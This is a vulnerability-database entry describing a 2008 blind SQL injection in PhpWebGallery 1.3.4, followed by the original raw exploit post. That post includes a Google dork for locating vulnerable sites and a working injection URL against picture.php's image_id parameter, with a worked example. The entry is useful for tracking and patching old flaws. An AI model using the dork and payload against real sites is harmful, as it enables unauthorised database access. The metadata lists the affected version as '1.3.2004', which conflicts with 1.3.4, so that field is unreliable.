PhpWebGallery 1.3.4

vendor:

PhpWebGallery

by:

Stack

7.5

CVSS

HIGH

Blind SQL Injection

CWE

Product Name: PhpWebGallery

Affected Version From: 1.3.2004

Affected Version To: 1.3.2004

Patch Exists: YES

Related CWE: N/A

CPE: a:phpwebgallery:phpwebgallery:1.3.4

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

A blind SQL injection vulnerability exists in PhpWebGallery 1.3.4. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow the attacker to gain access to sensitive information stored in the database.

Mitigation:

Upgrade to the latest version of PhpWebGallery.

Source

Exploit-DB raw data:

----------------------------------------------------------------
Script : PhpWebGallery 1.3.4
Type : Vulnerabilities (blind sql injection)
Author : Stack
Google Dork : inurl:"picture.php?cat=" "Powered by PhpWebGallery 1.3.4"
----------------------------------------------------------------
Download From : http://puzzle.dl.sourceforge.net/sourceforge/phpwebgallery/phpwebgallery-1.3.4.tar.bz2
----------------------------------------------------------------
waiting the demo exploit
----------------------------------------------------------------
Exploit :
http://site.il/phpwebgallery/picture.php?cat=[Real id]&image_id=[Real id]+and+substring(@@version,1,1)=5
Example :
http://site.il/phpwebgallery/picture.php?cat=3&image_id=76+and+substring(@@version,1,1)=5

# milw0rm.com [2008-09-11]